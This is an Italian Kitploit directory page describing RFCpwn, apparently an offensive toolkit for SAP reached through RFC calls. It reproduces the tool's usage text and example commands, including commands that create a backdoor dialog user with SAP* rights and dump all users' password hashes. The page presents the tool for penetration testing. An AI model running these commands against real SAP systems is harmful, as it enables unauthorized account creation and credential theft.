Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RFCpwn — Un toolkit di enumerazione e sfruttamento che utilizza chiamate RFC verso SAP | Kitploit
Strumenti/GitHubGitHub/icryo/rfcpwn
Password CrackingAnalisi delle VulnerabilitàExploitRaccolta InformazioniPenetration Testing
GitHubicryo/rfcpwn

RFCpwn

Un toolkit di enumerazione e sfruttamento che utilizza chiamate RFC verso SAP

Vedi Repository
40116 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RFCpwn

Un toolkit di enumerazione e sfruttamento SAP che utilizza chiamate RFC

Twitter: @icryo

Questo è un toolkit per dimostrare l'impatto di account di servizio compromessi.

Questa PoC non è destinata all'uso in ambienti di produzione, nessuna garanzia di stabilità o supporto.

RFCpwn si basa su pyrfc e sulle librerie fornite da SAP in: https://github.com/SAP/PyRFC#installation

root@kitploit:~
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
                   [-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
                   [-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]

An Impacket style enumeration and exploitation tool using SAP RFC calls

optional arguments:
  -h, --help   show this help message and exit
  -debug       Turn DEBUG output ON

Authentication:
  -ip IP       <targetName or address>
  -u Username  RFC Users Username
  -p Password  RFC Users Password
  -c Client    Client- eg.000
  -s Sysid     System Number- eg 00
  -ping        RFC Ping Command

User Abuse:
  -enum        Use to enumerate a specific user
  -usercopy    add a Dialog User
  -user USER   Required for -usercopy and -userenum to specify the user
  -copy COPY   User to be copied required for -usercopy
  -pw PW       password of new user for -usercopy

Hash Collection:
  -dump        Dump hashes use with below
  -exp         EXPERIMENTAL - Dump BCODE / PASSCODE hashes

Esempi

Ping - conferma connettività

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping

Copia i diritti di un utente in un nuovo utente dialog. Se -copy non è specificato, viene usato SAP*.

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1

Estrae gli hash da tutti gli utenti. Opzione -exp per gli hash sperimentali bcode e passcode.

root@kitploit:~
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump 

Dimostrazione

Immagine Imgur

Scarica lo strumento